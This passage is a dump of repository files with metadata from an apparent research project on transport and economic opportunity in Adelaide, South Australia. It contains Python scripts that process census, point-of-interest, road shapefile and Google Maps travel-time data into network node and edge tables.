f_adv_dip_dip_total', ' f_tot_35_44_yr', ' m_tot_25_34_yr',\n ' m_pg_deg_tot', ' m_tot_65_74_yr', ' m_tot_15_24_yr',\n ' f_pguate_deg_tot', ' m_b_deg_tot', ' m_cer_tot_tot',\n ' f_tot_25_34_yr', ' f_grad_dip_cer_tot', \n ' f_tot_85_yr_over']:\n g = col.split(\"_\")[0]\n if g in {\" m\", \"m\"}:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" m_tot_tot\"]\n else:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" f_tot_tot\"]\n \n gender_educ_df[\" m_percent\"] = gender_educ_df[\" m_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n gender_educ_df[\" f_percent\"] = gender_educ_df[\" f_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n age_gender_educ_df = age_df.merge(gender_educ_df, on=\" sa2_main16\", how=\"left\")\n helper = [str(elt) for elt in age_gender_educ_df[\" sa2_main16\"].values]\n \n age_gender_educ_df[\"SA2_MAIN16\"] = helper\n \n avg_med_age = []\n for idx, row in age_gender_educ_df.iterrows():\n avg = 0\n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs',\n ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',\n ' p_tot_55_64_yrs']:\n if col != \" p_tot_85ov\":\n temp = col.split(\"_\")\n x = int(temp[2])\n y = int(temp[3])\n med = (x+y)/2\n avg += (row[col]*med)\n else:\n avg += (row[col]*85)\n avg_med_age.append(avg)\n \n age_gender_educ_df[\" avg_med_age\"] = avg_med_age\n useful_df = age_gender_educ_df[[\"SA2_MAIN16\",\" m_percent\", \" f_percent\", \" avg_med_age\", \" p_tot_tot\"]]\n all_educ_df = pd.read_csv(mount_path + \"SA data/data_all_educ.csv\")\n \n degree_percentage = (all_educ_df[\" p_b_deg_tot\"] + all_educ_df[\" p_grad_dip_cer_tot\"])/all_educ_df[\" p_tot_tot\"]\n all_educ_df[\"degree_percentage\"] = degree_percentage\n all_educ_df[\"SA2_MAIN16\"] = [str(elt) for elt in all_educ_df[\" sa2_main16\"].values]\n \n useful_df = useful_df.merge(all_educ_df[[\"SA2_MAIN16\",\"degree_percentage\", \" p_cer_tot_tot\"]],how=\"left\", on=\"SA2_MAIN16\")\n useful_df.dropna()\n \n node_degree_poi_df = node_degree_poi_df.merge(useful_df, how=\"left\", on=\"SA2_MAIN16\")\n \n print(\"=====Done union_social=====\")\n \n return node_degree_poi_df\n\ndef get_final_node_edge_dfs(shp_file, road_file, mount_path):\n\n \"\"\"\n Converts shp_file (input) to the processed node_df and edge_df\n \"\"\"\n\n ## read files\n\n trans_mcc_df = pd.read_pickle(\"../../data_process/trans_mcc_df.pkl\")\n trans_age_df = pd.read_pickle(\"../../data_process/trans_age_df.pkl\")\n flow_df = pd.read_pickle(\"../../data_process/flow_df.pkl\")\n\n # read spatial files\n sa2_south_au = gpd.read_file(\"../../data_process/shapefiles/sa2_south_au.shp\")\n\n # read road networks\n road_file = gpd.read_file(\"../../data_process/shapefiles/sa2_roads.shp\")\n sa2_roads = process_road_shp(road_file)\n\n # read job and income data\n jobs_all = pd.read_pickle(\"../../data_process/jobs_all.pkl\")\n jobs_industries = pd.read_pickle(\"../../data_process/jobs_industries.pkl\")\n\n OD_full_path = shortest_path(shp_file)\n\n shp_proj, sa2_roads_proj = union_road_land_shp(shp_file, sa2_roads)\n \n degree_df = get_degree_df(shp_proj,sa2_roads_proj)\n\n edge_specific_df, node_specific_df = get_specific_df(OD_full_path, shp_file, shp_proj, mount_path)\n\n edge_degree_df, node_degree_df = union_degree(node_specific_df, edge_specific_df, degree_df, OD_full_path)\n\n edge_degree_poi_df, node_degree_poi_df = union_poi(node_degree_df, edge_degree_df)\n\n node_degree_poi_social_df = union_social(node_degree_poi_df, mount_path)\n\n return node_degree_poi_social_df, edge_degree_poi_df\n\nglobal trans_mcc_df\nglobal trans_age_df\nglobal flow_df\nglobal sa2_south_au\nglobal sa2_roads\nglobal jobs_all\nglobal jobs_industries\ntrans_mcc_df = pd.read_pickle(\"../../data_process/trans_mcc_df.pkl\")\ntrans_age_df = pd.read_pickle(\"../../data_process/trans_age_df.pkl\")\nflow_df = pd.read_pickle(\"../../data_process/flow_df.pkl\")\n\n# read spatial files\nsa2_south_au = gpd.read_file(\"../../data_process/shapefiles/sa2_south_au.shp\")\n\n\n# read job and income data\njobs_all = pd.read_pickle(\"../../data_process/jobs_all.pkl\")\njobs_industries = pd.read_pickle(\"../../data_process/jobs_industries.pkl\")\nif __name__ == \"__main__\":\n #TODO:\n if len(sys.argv) != 1:\n print(\"Invalid arugments\")\n pass\n else:\n shp_file = gpd.read_file(sys.argv[1])\n get_final_node_edge_dfs(shp_file)\n pass"
},
{
"alpha_fraction": 0.6332573890686035,
"alphanum_fraction": 0.6476841568946838,
"avg_line_length": 31.30327796936035,
"blob_id": "b023cd657bfd0ec8f989f18a896fa68346f655b3",
"content_id": "1657bd34d3b5816543a7594df69644ab8d083f23",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3951,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 122,
"path": "/src/d01_data/collect_travel_time.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# sw: script used to scrape travel time data from Google API.\n# No need to run the script for replication.\n# TBD: need to set up the global environment variables.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport geoplot\nfrom pysal.lib import weights\nimport networkx as nx\nfrom scipy.spatial import distance\nimport googlemaps\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# read files\nsa2_adelaide = gpd.read_file(intermediate_data_path + 'shapefiles/sa2_adelaide.shp')\n\nsa2_adelaide['centroids'] = sa2_adelaide.centroid\nsa2_adelaide['Lat'] = sa2_adelaide.centroids.y\nsa2_adelaide['Long'] = sa2_adelaide.centroids.x\n\n#\n# create a new dataframe\nOD = {}\nOD['o_idx'] = []\nOD['d_idx'] = []\nOD['o_sa2_idx'] = []\nOD['d_sa2_idx'] = []\nOD['o_lat'] = []\nOD['o_long'] = []\nOD['d_lat'] = []\nOD['d_long'] = []\n\nfor i in range(sa2_adelaide.shape[0]):\n print(\"Origin Index is: \", i)\n o_idx = i\n o_sa2_idx = sa2_adelaide.loc[i, 'SA2_MAIN16']\n o_lat = sa2_adelaide.loc[i, 'Lat']\n o_long = sa2_adelaide.loc[i, 'Long']\n\n for j in range(sa2_adelaide.shape[0]):\n d_idx = j\n d_sa2_idx = sa2_adelaide.loc[j, 'SA2_MAIN16']\n d_lat = sa2_adelaide.loc[j, 'Lat']\n d_long = sa2_adelaide.loc[j, 'Long']\n\n # append\n OD['o_idx'].append(o_idx)\n OD['d_idx'].append(d_idx)\n OD['o_sa2_idx'].append(o_sa2_idx)\n OD['d_sa2_idx'].append(d_sa2_idx)\n OD['o_lat'].append(o_lat)\n OD['o_long'].append(o_long)\n OD['d_lat'].append(d_lat)\n OD['d_long'].append(d_long)\n\n# create the data frame\nOD_df = pd.DataFrame(OD)\n\n# Need to specify your API_key\ngmaps = googlemaps.Client(key=API_key)\n\nOD_time_dic = {}\n\nfor idx in range(OD_df.shape[0]):\n # scraping codes - Google does not allow it.\n if idx%100 == 0:\n print(idx)\n o_lat,o_long,d_lat,d_long = OD_df.loc[idx, ['o_lat','o_long','d_lat','d_long']]\n origin = (o_lat,o_long)\n destination = (d_lat,d_long)\n result = gmaps.distance_matrix(origin, destination, mode = 'driving')\n OD_time_dic[idx] = result\n\n# Augment Google data\nOD_from_google_api = {}\nOD_from_google_api['idx'] = [] # Important for combining two dfs\nOD_from_google_api['d_address'] = []\nOD_from_google_api['o_address'] = []\nOD_from_google_api['od_duration_text'] = []\nOD_from_google_api['od_duration_value'] = []\nOD_from_google_api['od_distance_text'] = []\nOD_from_google_api['od_distance_value'] = []\n\nfor key in OD_time_dic.keys():\n if key%100 == 0:\n print(key)\n OD_from_google_api['idx'].append(key)\n OD_from_google_api['d_address'].append(OD_time_dic[key]['destination_addresses'][0])\n OD_from_google_api['o_address'].append(OD_time_dic[key]['origin_addresses'][0])\n OD_from_google_api['od_duration_text'].append(OD_time_dic[key]['rows'][0]['elements'][0]['duration']['text'])\n OD_from_google_api['od_duration_value'].append(OD_time_dic[key]['rows'][0]['elements'][0]['duration']['value'])\n OD_from_google_api['od_distance_text'].append(OD_time_dic[key]['rows'][0]['elements'][0]['distance']['text'])\n OD_from_google_api['od_distance_value'].append(OD_time_dic[key]['rows'][0]['elements'][0]['distance']['value'])\n\nOD_from_google_api_df = pd.DataFrame(OD_from_google_api)\n\n# merge\nOD_merged_google_api = OD_df.merge(OD_from_google_api_df, left_index=True, right_index=True)\nOD_merged_google_api\n\n# save\nimport pickle\n\nwith open(\"../data/OD_Google_API_raw.pickle\", 'wb') as w:\n pickle.dump(OD_time_dic, w, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open(\"../data/OD_Google_API_With_Map_Info.pickle\", 'wb') as w:\n pickle.dump(OD_merged_google_api, w, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6350315809249878,
"alphanum_fraction": 0.6444414854049683,
"avg_line_length": 43.2023811340332,
"blob_id": "5ea09d906ece4b77b0daa7232aacd94b93315751",
"content_id": "e01da3d52f6a63d5da4f28d4b9cd256029a814ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7439,
"license_type": "permissive",
"max_line_length": 163,
"num_lines": 168,
"path": "/src/d02_intermediate/preprocess_2_POIs.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# processing POI data\n# inputs: raw POI\n# outputs: node df with POIs' counts, entropy, etc.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia/\"\n\n# read poi\npoi_df = gpd.read_file(raw_data_path + \"points/points.shp\")\nsa2_adelaide = gpd.read_file(intermediate_data_path + 'shapefiles/sa2_adelaide.shp')\n\n# print(poi_df.shape)\n# print(poi_df.columns)\n\n#region 1. Assign POIs to SA2 (15 min)\n# assign POIs to sa2 in Adelaide\nsa_codes_poi = []\nfor i, centroid in enumerate(poi_df.geometry):\n if i % 1000 == 0: print(i)\n found = False\n for j, row in sa2_adelaide.iterrows():\n if row[\"geometry\"].contains(centroid):\n sa_codes_poi.append(row[\"SA2_MAIN16\"])\n found = True\n break\n if not found:\n sa_codes_poi.append(\"0\")\n\npoi_df[\"SA2_MAIN16\"] = sa_codes_poi\npoi_df = poi_df.loc[poi_df[\"SA2_MAIN16\"]!='0', :]\nprint(poi_df.shape)\n\n# new mapping.\ndrop_list = ['Historical_House',\n 'adit','alpine_hut','animal_boarding','antenna','apartment','beacon','bench','bicycle_parking',\n 'buffer_stop','building','bus_station','bus_stop',\n 'chalet', 'charging_station', 'chimney', 'clock',\n 'communications_t','compressed_air','construction','crossing',\n 'device_charging_','disused','dojo', 'drinking_water',\n 'elevator',\n 'flagpole','fuel','funeral_home',\n 'garbage_can','give_way','goods_conveyor','guest_house;hote','grave_yard','guest_house','guest_house;hote',\n 'halt',\n 'kiln',\n 'lamp','level_crossing','loading_dock',\n 'manhole', 'mast', 'milestone', 'mine', 'mine_shaft', 'motorway_junctio',\n 'parking', 'parking_entrance', 'parking_space', 'proposed',\n 'rest_area',\n 'sanitary_dump_st', 'silo', 'speed_camera','station','steps','stop','street_cabinet',\n 'street_lamp','subway_entrance','surveillance','survey_point','swings','switch',\n 'tank','taxi','tomb','tower',\n 'traffic_signals','traffic_signals;','trailhead','tram_level_cross','tram_stop','tree','turning_circle','turning_loop','turntable',\n 'waste_basket','waste_transfer_s','wastewater_plant','water_point','water_tank','water_tap',\n 'water_tower','water_well','windmill','windpump','wreck',\n 'yes']\neducation = ['childcare', 'college', 'community_centre', 'kindergarten', 'music_school', 'school', 'university']\ntour = ['attraction', 'castle', 'ferry_terminal', 'monument',\n 'picnic_site', 'place_of_worship', 'viewpoint', 'zoo']\nrestaurant = ['bar', 'bbq', 'cafe', 'fast_food', 'food_court', 'ice_cream', 'pub', 'restaurant', 'restaurant;bar']\nculture = ['arts_centre', 'artwork', 'gallery', 'library', 'memorial', 'museum',\n 'piano', 'public_bookcase', 'ruins', 'shower', 'studio', 'theatre']\nrecreation = ['camp_pitch', 'camp_site', 'caravan_site', 'cinema', 'events_venue',\n 'fountain', 'nightclub', 'stripclub', 'swimming_pool']\nsmall_business = ['bicycle_rental', 'bicycle_repair_s', 'brothel', 'car_rental', 'car_wash', 'gambling', 'makerspace','marketplace',\n 'vending_machine','veterinary','winery']\nhotel = ['hostel', 'hotel', 'motel']\ninformation = ['information', 'monitoring_stati', 'newsagency', 'telephone']\ngovernment = ['bureau_de_change', 'courthouse', 'fire_station', 'police', 'post_box', 'post_office', 'prison', 'pumping_station',\n 'recycling', 'scout_hall', 'scrapyard', 'shelter', 'shelter;drinking', 'social_facility', 'storage_tank',\n 'toilets','townhall']\nmedical = ['clinic', 'dentist', 'doctors', 'first_aid', 'hospital', 'pharmacy', 'surgery']\nfinance = ['atm', 'bank']\n\n# replacement dictionary\nreplacement_dict = dict(zip(drop_list+education+tour+restaurant+culture+recreation+small_business+hotel+information+government+medical+finance,\n ['drop']*len(drop_list)+['education']*len(education)+['tour']*len(restaurant)+['restaurant']*len(restaurant)+['culture']*len(culture)+\\\n ['recreation']*len(recreation)+['small_business']*len(small_business)+['hotel']*len(hotel)+['information']*len(information)+\\\n ['government']*len(government)+['medical']*len(medical)+['finance']*len(finance)))\n#\nnew_type = poi_df['type'].replace(to_replace = replacement_dict)\npoi_df['type_agg'] = new_type # new category of POIs\n\npoi_df.to_pickle(intermediate_data_path+\"POI_with_SA2_idx.pickle\")\n#endregion\n\n\n\n\n#region 2. Create aggregate counts and entropy for SA2.\n# output columns:\n# poi_count, poi_entropy, poi_count_per_area, poi_entropy_per_area,\n# poi_count_agg, poi_entropy_agg, poi_count_agg_per_area, poi_entropy_agg_per_area\nwith open(intermediate_data_path+\"POI_with_SA2_idx.pickle\", 'rb') as f:\n poi_df = pickle.load(f)\nsa2_adelaide = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# remove the type_agg == drop\npoi_agg_df = poi_df.loc[poi_df['type_agg'] != 'drop', :]\n\n# create counts\ncount = poi_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])[('geometry', 'count')]\ncount_agg = poi_agg_df.groupby([\"SA2_MAIN16\"],as_index=False).aggregate([\"count\"])[('geometry', 'count')] # miss one obs\n\n# create entropy\ndef return_entropy(poi, count):\n '''\n return: entropy df\n '''\n\n split_count = poi.groupby([\"SA2_MAIN16\",\"type\"],as_index=False).aggregate([\"count\"])\n entropy = {}\n for i, row in split_count.iterrows():\n sa_id, _type = i\n total_count = count.loc[sa_id]\n val = row[('geometry', 'count')] / total_count\n\n if sa_id not in entropy:\n entropy[sa_id] = (-val * np.log(val))\n else:\n entropy[sa_id] += (-val * np.log(val))\n\n entropy_df = pd.Series(entropy.values(), index=entropy.keys())\n return entropy_df\n\n# compute two entropy values\nentropy_df = return_entropy(poi_df, count)\nentropy_agg_df = return_entropy(poi_agg_df, count_agg)\n\n#\ncount.name = 'poi_count'\ncount_agg.name = 'poi_count_agg'\nentropy_df.name = 'poi_entropy'\nentropy_agg_df.name = 'poi_entropy_agg'\n\n#\nsa2_adelaide_merge=pd.merge(sa2_adelaide, count.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(count_agg.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(entropy_df.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\nsa2_adelaide_merge=sa2_adelaide_merge.merge(entropy_agg_df.to_frame(), left_on='SA2_MAIN16', right_index=True, how='outer')\n\n# nan and zeros exist.\nprint(\"Number of nan is: \", np.sum(sa2_adelaide_merge.isna()))\nprint(\"Number of zeros is: \", np.sum(sa2_adelaide_merge == 0))\n\n# save the data\nsa2_adelaide_merge.to_pickle(intermediate_data_path+'sa2_node_with_POI_counts_entropy.pickle')\n\n#endregion\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6835096478462219,
"alphanum_fraction": 0.709199070930481,
"avg_line_length": 41.44578170776367,
"blob_id": "695947a0063fa740fdb1bad469c33e62c5b4503e",
"content_id": "7d834cfff5b05fd625f3827a226c2e6d6c4affc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10588,
"license_type": "permissive",
"max_line_length": 173,
"num_lines": 249,
"path": "/src/d02_intermediate/preprocess_0_shapefiles.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# processing the SA2 and road shapefiles\n# inputs: raw SA2 and road shapefiles\n# Outputs: Adelaide SA2 nodal and link dataframes with transport information\n# Outputs are pickles:\n# sa2_node_with_only_transport_attributes.pickle\n# sa2_edge_with_only_transport_attributes.pickle\n# Processing files saved:\n# sa2_adelaide.shp, sa2_adelaide_edge.shp, OD_full_path.pickle, sa2_roads_in_adelaide.shp, etc.\n# util needed: shortest path dictionary; a function turning the road networks to the link dataframe.\n# time: ~15 min\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nfrom pysal.lib import weights\nimport networkx as nx\nimport momepy\nimport pickle\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# # read files\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n\n#region 1. Extact the SA2s for Adelaide area.\n# raw data\nsa2_shape = gpd.read_file(raw_data_path + \"sa2/SA2_2016_AUST.shp\")\n\n# Keep Adelaide area\n# info from: file:///Users/shenhaowang/Downloads/StatePublicHealthPlan_Final.pdf (page 32)\nadelaide_sa4_set = ['401','402','403','404']\nsa2_adelaide = sa2_shape.loc[sa2_shape.SA4_CODE16.isin(adelaide_sa4_set)]\nprint(\"Shape of SA2 in the Adelaide area is: \", sa2_adelaide.shape)\n\n# only use the most relevant variables.\nsa2_adelaide = sa2_adelaide[['SA2_MAIN16', 'SA2_NAME16', 'geometry']]\n\n# projection\nsa2_adelaide.crs = 'epsg:3112'\nprint(sa2_adelaide.crs)\n\n# create a sa2_adelaide link dataframe\nindex = pd.MultiIndex.from_product([sa2_adelaide['SA2_MAIN16'], sa2_adelaide['SA2_MAIN16']], names=['O', 'D'])\nsa2_adelaide_link_df = pd.DataFrame(index=index).reset_index()\n\n# add the geometry part to sa2_adelaide_link_df\nfrom shapely.geometry import LineString\nedge_list = []\nfor idx in range(sa2_adelaide_link_df.shape[0]):\n origin = sa2_adelaide_link_df.loc[idx, 'O']\n destination = sa2_adelaide_link_df.loc[idx, 'D']\n edge = LineString([sa2_adelaide.loc[sa2_adelaide['SA2_MAIN16'] == origin, 'geometry'].centroid.values[0],\n sa2_adelaide.loc[sa2_adelaide['SA2_MAIN16'] == destination, 'geometry'].centroid.values[0]])\n edge_list.append(edge)\n\nsa2_adelaide_link_df['geometry'] = edge_list\n\n# create the gpd object\nsa2_adelaide_link = gpd.GeoDataFrame(sa2_adelaide_link_df, crs='epsg:3112')\n\n# save the process SA2 Adelaide shapefile\nsa2_adelaide.to_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\nsa2_adelaide_link.to_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n#endregion\n\n\n\n#region 2. Create the OD shortest path dictionary for SA2 Adelaide shapefile.\nsa2_adelaide=gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# create the queen contiguity network\nadelaide_queen=weights.contiguity.Queen.from_dataframe(sa2_adelaide)\n\n# create the kernel network (using Euclidean distances)\nsa2_adelaide_kernel = weights.distance.Kernel.from_dataframe(sa2_adelaide, k=109)\n\n# turn the defaults to euclidean distances as weights.\nfor i in sa2_adelaide_kernel.neighbors.keys():\n for j_idx in range(len(sa2_adelaide_kernel.neighbors[i])):\n j = sa2_adelaide_kernel.neighbors[i][j_idx]\n # note that kw.weights indices are\n # i (node index), j_idx (index of the node on the list - not node index!)\n weight = sa2_adelaide_kernel.weights[i][j_idx]\n distance = (1 - weight) * sa2_adelaide_kernel.bandwidth[i]\n sa2_adelaide_kernel.weights[i][j_idx] = distance[0]\n\n# assign euclidean weights to Queen net\nfor o in adelaide_queen.neighbors.keys():\n# print(o)\n for d_idx in range(len(adelaide_queen.neighbors[o])):\n d = adelaide_queen.neighbors[o][d_idx] # return the o and d SA2 original indices.\n weight = sa2_adelaide_kernel[o][d] # get the kernel weight associated with the o and d.\n adelaide_queen.weights[o][d_idx] = weight\n\n# print(adelaide_queen.weights)\n\n# create the nx object\nadelaide_nx = adelaide_queen.to_networkx()\n# assign weights to adelaide_nx\nfor o,d in adelaide_nx.edges:\n adelaide_nx.edges[o,d]['weight'] = adelaide_queen[o][d]\n\n# create the OD dictionary for the full shortest paths.\npath=dict(nx.all_pairs_dijkstra(adelaide_nx, weight='weight'))\n\n# create a OD dictionary.\nOD_full_path = {}\n\nfor o in range(110):\n for d in range(110):\n if d == 103 or o == 103: # note that 103 is the island - this is no path to it.\n pass\n else:\n OD_full_path[(o,d)] = path[o][1][d]\n\n# note: OD_full_path idx is the same as sa2_adelaide!\nwith open(intermediate_data_path+'OD_full_path.pickle', 'wb') as f:\n pickle.dump(OD_full_path, f)\n#endregion\n\n\n\n#region 3. Read road shapefiles and save them\nsa2_roads = gpd.read_file(raw_data_path + \"roads/Roads_GDA2020.shp\")\nsa2_roads = sa2_roads.loc[~sa2_roads['class'].isna(),]\n\n# projection to epsg:3112\nsa2_roads.crs = 'epsg:3112'\n\n# combine freeway and highway as one category (HWY).\nsa2_roads.loc[sa2_roads['class'] == 'FREE', 'class'] = 'HWY'\n\n# extract three types of roads for GIS visualization\nsa2_roads_LOCL = sa2_roads.loc[sa2_roads['class'] == 'LOCL', :]\nsa2_roads_HWY = sa2_roads.loc[sa2_roads['class'] == 'HWY', :]\nsa2_roads_UND = sa2_roads.loc[sa2_roads['class'] == 'UND', :]\n\n# np.unique(sa2_roads['class'], return_counts = True)\n\n\n# save shapefiles\nsa2_roads.to_file(intermediate_data_path+\"shapefiles/sa2_roads.shp\")\nsa2_roads_LOCL.to_file(intermediate_data_path+\"shapefiles/sa2_roads_LOCL.shp\")\nsa2_roads_HWY.to_file(intermediate_data_path+\"shapefiles/sa2_roads_HWY.shp\")\nsa2_roads_UND.to_file(intermediate_data_path+\"shapefiles/sa2_roads_UND.shp\")\n\n#endregion\n\n\n\n\n#region 4. Turn road shapefiles to node attributes of SA2s' nodes.\n# attributes: number of road counts and intersection counts.\n# inputs: roads and sa2 shapefiles\n# outputs: sa2 shapefile with road attributes.\nsa2_roads = gpd.read_file(intermediate_data_path+\"shapefiles/sa2_roads.shp\")\nsa2_adelaide = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\n\n# augment road class info to sa2_adelaide\nsa2_adelaide_road_attributes, roads_in_adelaide = util.compute_road_attributes(sa2_adelaide, sa2_roads)\nsa2_adelaide_road_attributes['num_roads'] = np.sum(sa2_adelaide_road_attributes[['class_ART', 'class_BUS', 'class_COLL',\n 'class_HWY', 'class_LOCL','class_SUBA', 'class_TRK2',\n 'class_TRK4', 'class_UND']], axis = 1)\n\n# augment intersection attributes to sa2_adelaide\nsa2_adelaide_intersection_attributes = util.compute_intersection_attributes(sa2_adelaide_road_attributes, roads_in_adelaide)\n\n# merge sa2_adelaide, sa2_adelaide_road_attributes, and sa2_adelaide_intersection_attributes\nsa2_adelaide_with_transport_attributes = sa2_adelaide.merge(sa2_adelaide_road_attributes, on='SA2_MAIN16', how='outer', suffixes=(\"\",\"_x\"))\nsa2_adelaide_with_transport_attributes.drop(columns=['SA2_NAME16_x', 'geometry_x'], inplace=True)\nsa2_adelaide_with_transport_attributes = sa2_adelaide_with_transport_attributes.merge(sa2_adelaide_intersection_attributes, on='SA2_MAIN16', how='outer', suffixes=(\"\",\"_x\"))\n\n# save sa2_adelaide_with_transport_attributes and roads_in_adelaide\nsa2_adelaide_with_transport_attributes.to_pickle(intermediate_data_path+\"sa2_node_with_only_transport_attributes.pickle\")\nroads_in_adelaide.to_file(intermediate_data_path+\"shapefiles/sa2_roads_in_adelaide.shp\")\n# sw: Wow. Pickle can save & read the shapefiles with crs info kept.\n# sw: I still saved to shp files because QGIS cannot read pickle, I guess.\n# with open(\"./data/sa2_adelaide_with_transport_attributes.pickle\", 'rb') as f:\n# x_file = pickle.load(f)\n# print(x_file.crs)\n\n#endregion\n\n\n#region 5. Turn road shapefiles to the attributes of SA2s' edges.\n# It takes about five minutes for processing.\n# roads_in_adelaide = gpd.read_file(\"./data/shapefiles/sa2_roads_in_adelaide.shp\")\n\n# 1. edge file\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n\n# 2. transport attribute file\nwith open(intermediate_data_path+\"sa2_node_with_only_transport_attributes.pickle\", 'rb') as f:\n sa2_adelaide_with_transport_attributes = pickle.load(f)\n\n# 3. OD path file\nwith open(intermediate_data_path+'OD_full_path.pickle', 'rb') as f:\n OD_full_path = pickle.load(f)\n\n# add the road and intersection attributes to the sa2_adelaide_edge data set.\nattribute_name_list = ['class_ART', 'class_BUS', 'class_COLL',\n 'class_HWY', 'class_LOCL', 'class_SUBA',\n 'class_TRK2', 'class_TRK4', 'class_UND', 'num_roads', 'num_nodes', 'num_1degree',\n 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']\n\nsa2_adelaide_edge[attribute_name_list] = 0.0 # init values\n\n# add road and intersection attributes to the edge df.\nfor idx in np.arange(sa2_adelaide_edge.shape[0]):\n if idx%1000 == 0:\n print(idx)\n origin = sa2_adelaide_edge.loc[idx, 'O']\n destination = sa2_adelaide_edge.loc[idx, 'D']\n o_idx = sa2_adelaide_with_transport_attributes.index[sa2_adelaide_with_transport_attributes.SA2_MAIN16 == origin].tolist()[0]\n d_idx = sa2_adelaide_with_transport_attributes.index[sa2_adelaide_with_transport_attributes.SA2_MAIN16 == destination].tolist()[0]\n # print(o_idx,d_idx)\n\n try:\n # OD_full_path might not have all the shortest path...\n # note that the OD_full_path idx is consistent with sa2_adelaide.\n idx_list_on_shortest_path = OD_full_path[(o_idx, d_idx)]\n for node_on_shortest_path in idx_list_on_shortest_path:\n sa2_adelaide_edge.loc[idx, attribute_name_list] += sa2_adelaide_with_transport_attributes.loc[\n node_on_shortest_path, attribute_name_list]\n except KeyError as error:\n pass\n\n# output two pickles:\n# node network with transport info: sa2_adelaide_with_transport_attributes\n# edge network with transport info: sa2_adelaide_edge\nsa2_adelaide_with_transport_attributes.to_pickle(intermediate_data_path+'sa2_node_with_only_transport_attributes.pickle')\nsa2_adelaide_edge.to_pickle(intermediate_data_path+'sa2_edge_with_only_transport_attributes.pickle')\n\n#endregion\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8541666865348816,
"alphanum_fraction": 0.8541666865348816,
"avg_line_length": 48,
"blob_id": "91344633af347fddb6c2fb628780144348bfcc51",
"content_id": "79f0d72566a9e059b3229685f5692b9233ff45cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 1,
"path": "/test.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import utils.util.compute_road_attributes as cra"
},
{
"alpha_fraction": 0.3176761567592621,
"alphanum_fraction": 0.3238566219806671,
"avg_line_length": 39.349998474121094,
"blob_id": "3a162d2438c796c841acc32e979acf040ab06b0c",
"content_id": "52bb9a2d460d290c8cf07974bdde07fc1a87221d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 809,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 20,
"path": "/Makefile",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
